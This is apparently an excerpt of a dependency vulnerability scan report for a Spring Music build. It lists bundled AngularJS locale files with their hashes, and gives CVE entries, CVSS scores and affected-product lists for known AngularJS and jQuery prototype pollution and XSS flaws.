spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_zh-hans-cn.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_zh-hans-cn.jsMD5: aeccf8e7f5414894e70970388601a7cfSHA1: ce83ee76bee45caeaf070d4734052b2502047ccbSHA256: 00d1fd2c4cfc91d21813dd407fa66fabe1b96f1685e984679e13d295a278cd06
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_zh-hk.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_zh-hk.jsMD5: 0fdd2d0ddd3042f8f7f518a98f51585fSHA1: 84f4b2ec7182ec6e2869167bf4eb2b08b00053deSHA256: 68ff34f9c26aa6a131bc655c4ae36c89dc3b8d24f88569d5d4969b1641d0bb21
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_zh-tw.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_zh-tw.jsMD5: 2a5a502645668d5efe7e488957b9233aSHA1: 07e0dcc027a064f29c13e35a09e2f92066d0a28dSHA256: 045b19e4b4d7201c7ab4d9a9f19165bfdb1cc8824189ce849d14fcae0ba0d2b8
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_zh.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_zh.jsMD5: b29c3a0407d161e042a23386ea7e405fSHA1: 3fd2034f27f570f70d1fbdbade4f9467e80294d0SHA256: cd827238c4d6ec4653826488f8711c7dfecaeea647fabb08397f996f5ef08637
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_zu-za.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_zu-za.jsMD5: 908af5dc86261d7a52e25ecbe64cc9b7SHA1: 3ef47b228b2297f3a88cb356bf0a5a82e38a6132SHA256: b2c07473495615bb399dc2f058b5edff2a27f36ae00e586168e7afa350fe35a0
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_zu.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_zu.jsMD5: 1d53670898c93b57ca3c9e42eb19beceSHA1: 4cb4e863424b99a4b77e4bbd71965c02eb4bc950SHA256: 5a2f1ad5285644bffbe32058950359e51c2c8693bd0a30e811acbcc97dc9937c
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-scenario.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/angular-scenario.jsMD5: 3f2aaf7bf49592919bdec2394f6eafb3SHA1: 320b4aa0cb282267fcae967a109bf6bedb500d1bSHA256: d65ab66625aaf21f6f78bb577a81e21210919c6a3271d388ddbc90ffae71040b
Evidence Type Source Name Value Confidence Vendor file name angularjs High Vendor file name jquery High Product file name angularjs High Product file name jquery High Version file version 1.10.2 High Version file version 1.2.16 High
CVE-2019-10768 suppress
In AngularJS before 1.7.9 the function `merge()` could be tricked into adding or modifying properties of `Object.prototype` using a `__proto__` payload. CWE-1321 Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N References:
Vulnerable Software & Versions (NVD):
cpe:2.3:a:angularjs:angular.js:*:*:*:*:*:*:*:* versions up to (excluding) 1.7.9 CVE-2015-9251 suppress
jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH af854a3a-2127-422b-91ae-364da2661108 - PATCH af854a3a-2127-422b-91ae-364da2661108 - PATCH af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,US_GOVERNMENT_RESOURCE af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH cve@mitre.org - PATCH cve@mitre.org - PATCH cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY,US_GOVERNMENT_RESOURCE cve@mitre.org - THIRD_PARTY_ADVISORY,VDB_ENTRY info - http://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/ info - http://research.insecurelabs.org/jquery/test/ info - https://bugs.jquery.com/ticket/11974 info - https://github.com/advisories/GHSA-rmxg-73gg-4p98 info - https://github.com/jquery/jquery/issues/2432 info - https://nvd.nist.gov/vuln/detail/CVE-2015-9251 Vulnerable Software & Versions (NVD):
cpe:2.3:a:jquery:jquery:*:*:*:*:*:*:*:* versions up to (excluding) 3.0.0 cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.3.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_platform:2.6.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_platform:2.6.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_platform:2.6.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:business_process_management_suite:11.1.1.9.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:business_process_management_suite:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:business_process_management_suite:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_converged_application_server:*:*:*:*:*:*:*:* versions up to (excluding) 7.0.0.1 cpe:2.3:a:oracle:communications_interactive_session_recorder:6.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_interactive_session_recorder:6.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_interactive_session_recorder:6.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_services_gatekeeper:*:*:*:*:*:*:*:* versions up to (excluding) 6.1.0.4.0 cpe:2.3:a:oracle:communications_webrtc_session_controller:*:*:*:*:*:*:*:* versions up to (excluding) 7.2 cpe:2.3:a:oracle:endeca_information_discovery_studio:3.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:endeca_information_discovery_studio:3.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_manager_ops_center:12.2.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_manager_ops_center:12.3.3:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_operations_monitor:3.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_operations_monitor:4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:* versions from (including) 7.3.3; versions up to (including) 7.3.5 cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:* versions from (including) 8.0.0; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_asset_liability_management:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_data_integration_hub:*:*:*:*:*:*:*:* versions from (including) 8.0.5; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_liquidity_risk_management:*:*:*:*:*:*:*:* versions from (including) 8.0.2; versions up to (including) 8.0.6 cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:*:*:*:*:*:*:*:* versions from (including) 8.0.2; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.5:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_profitability_management:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.6 cpe:2.3:a:oracle:financial_services_reconciliation_framework:8.0.5:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_reconciliation_framework:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_cruise_fleet_management:9.0.11:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_guest_access:4.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_guest_access:4.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_materials_control:18.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_reporting_and_analytics:9.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.5:*:*:*:*:*:*:* cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:oss_support_tools:19.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.55:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_gateway:15.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_gateway:16.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_gateway:17.12:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:* versions from (including) 17.1; versions up to (including) 17.12 cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:real-time_scheduler:2.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_allocation:15.0.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_insights:15.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_insights:16.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_invoice_matching:15.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_sales_audit:15.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_workforce_management_software:1.60.9:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_workforce_management_software:1.64.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:service_bus:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:service_bus:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:siebel_ui_framework:18.10:*:*:*:*:*:*:* cpe:2.3:a:oracle:siebel_ui_framework:18.11:*:*:*:*:*:*:* cpe:2.3:a:oracle:utilities_framework:*:*:*:*:*:*:*:* versions from (including) 4.3.0.1; versions up to (including) 4.3.0.4 cpe:2.3:a:oracle:utilities_mobile_workforce_management:2.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:webcenter_sites:11.1.1.8.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.2.1.3:*:*:*:*:*:*:* CVE-2019-11358 suppress
jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable __proto__ property, it could extend the native Object.prototype. CWE-1321 Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK,THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY cve@mitre.org - BROKEN_LINK,THIRD_PARTY_ADVISORY,VDB_ENTRY cve@mitre.org - EXPLOIT,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING,MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - RELEASE_NOTES,VENDOR_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY,VDB_ENTRY cve@mitre.org - THIRD_PARTY_ADVISORY,VDB_ENTRY cve@mitre.org - THIRD_PARTY_ADVISORY,VDB_ENTRY info - https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/ info - https://github.com/jquery/jquery/commit/753d591aea698e57d6db58c9f722cd0808619b1b info - https://nvd.nist.gov/vuln/detail/CVE-2019-11358 Vulnerable Software & Versions (NVD):
cpe:2.3:a:backdropcms:backdrop:*:*:*:*:*:*:*:* versions from (including) 1.11.0; versions up to (excluding) 1.11.9 cpe:2.3:a:backdropcms:backdrop:*:*:*:*:*:*:*:* versions from (including) 1.12.0; versions up to (excluding) 1.12.6 cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 7.0; versions up to (excluding) 7.66 cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 8.5.0; versions up to (excluding) 8.5.15 cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 8.6.0; versions up to (excluding) 8.6.15 cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* versions from (including) 3.0.0; versions up to (including) 3.9.4 cpe:2.3:a:jquery:jquery:*:*:*:*:*:*:*:* versions up to (excluding) 3.4.0 cpe:2.3:a:netapp:oncommand_system_manager:*:*:*:*:*:*:*:* versions from (including) 3.0; versions up to (including) 3.1.3 cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:* cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_express:*:*:*:*:*:*:*:* versions up to (excluding) 19.1 cpe:2.3:a:oracle:application_service_level_management:13.2.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_service_level_management:13.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_testing_suite:12.5.0.3:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_testing_suite:13.1.0.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_testing_suite:13.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_testing_suite:13.2.0.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_testing_suite:13.3:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:18.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:18.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:18.3:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:19.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:19.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:20.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_enterprise_collections:*:*:*:*:*:*:*:* versions from (including) 2.7.0; versions up to (including) 2.8.0 cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:* versions from (including) 2.4.0; versions up to (including) 2.10.0 cpe:2.3:a:oracle:bi_publisher:5.5.0.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:bi_publisher:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:bi_publisher:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:big_data_discovery:1.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:business_process_management_suite:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:business_process_management_suite:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_analytics:12.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_application_session_controller:3.8m0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5:*:*:*:*:*:*:* 